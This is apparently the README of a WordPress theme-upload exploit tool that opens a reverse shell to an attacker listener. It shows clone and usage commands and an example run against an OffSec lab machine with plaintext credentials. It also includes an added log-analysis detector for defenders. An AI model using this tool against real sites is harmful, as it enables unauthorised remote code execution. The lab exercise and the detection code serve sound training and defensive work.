This script makes WordPress exploitation faster and more efficient by uploading themes automatically instead of by hand. This saves a lot of time, since WordPress is often very slow or even returns errors.

    git clone https://github.com/DLL00P/Wordpress-Theme-Upload-Exploit
    cd Wordpress-Theme-Upload-Exploit
    python3 exploit.py -u "URL" -U "USER" -P "PASSWORD" -lh "YOUR_IP" -lp "YOUR_PORT" -s "SHELL_TYPE"

    -u,  --url       Target URL (e.g., http://127.0.0.1/)
    -U,  --username  WordPress username
    -P,  --password  WordPress password
    -lh, --lhost     Attacker's local IP (listener host)
    -lp, --lport     Attacker's local port (listener port)
    -s,  --shell     Shell type (bash, sh, powershell, cmd). Default: powershell
    -t,  --theme     Theme name. Default: EvilTheme

    python3 exploit.py -u http://192.168.110.55/shenzi/wp-admin/ -U admin -P FeltHeadwallWight357 -lh 192.168.45.199 -lp 1234 -s powershell

This example was run against the Shenzi machine from OffSec. Because it is a Windows machine, the shell type is set to powershell.
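
For defenders, an authenticated theme upload followed by a direct request to a PHP file in the new theme directory leaves a recognisable pair of entries in the web server access log. The sketch below is an added example, not code from this repository: it assumes Apache/Nginx "combined" log format, WordPress core's standard upload handler (`wp-admin/update.php?action=upload-theme`), a 10-minute correlation window, and constructed sample log lines.

```python
import re
from datetime import datetime, timedelta

# Apache/Nginx "combined" log line: client IP, timestamp, method, path, status
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# WordPress core receives theme ZIP uploads at this wp-admin handler
UPLOAD = re.compile(r'/wp-admin/update\.php\?(?:.*&)?action=upload-theme')
# A PHP file inside a theme directory requested directly by a client
THEME_PHP = re.compile(r'/wp-content/themes/(?P<theme>[^/]+)/[^?]*\.php')
WINDOW = timedelta(minutes=10)  # assumed correlation window


def find_theme_upload_abuse(lines):
    """Return (ip, theme, upload_time, hit_time) for each direct theme-PHP
    request that follows a successful theme upload from the same client."""
    uploads = {}    # client IP -> time of its last successful theme upload
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path, status = m["ip"], m["path"], int(m["status"])
        if m["method"] == "POST" and UPLOAD.search(path) and status < 400:
            uploads[ip] = ts
            continue
        hit = THEME_PHP.search(path)
        if hit and ip in uploads and ts - uploads[ip] <= WINDOW:
            findings.append((ip, hit["theme"], uploads[ip], ts))
    return findings


# Constructed sample log lines (documentation IP ranges, not a real host)
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '192.0.2.10 - - [12/Mar/2024:10:00:05 +0000] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Mar/2024:10:00:09 +0000] "GET /wp-content/themes/EvilTheme/index.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Mar/2024:10:01:00 +0000] "GET /wp-content/themes/twentytwenty/style.css HTTP/1.1" 200 900',
    '198.51.100.7 - - [12/Mar/2024:10:02:00 +0000] "GET /wp-content/themes/twentytwenty/index.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, theme, up, hit in find_theme_upload_abuse(SAMPLE):
        print(f"{ip} uploaded a theme at {up} then requested PHP in '{theme}' at {hit}")
```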
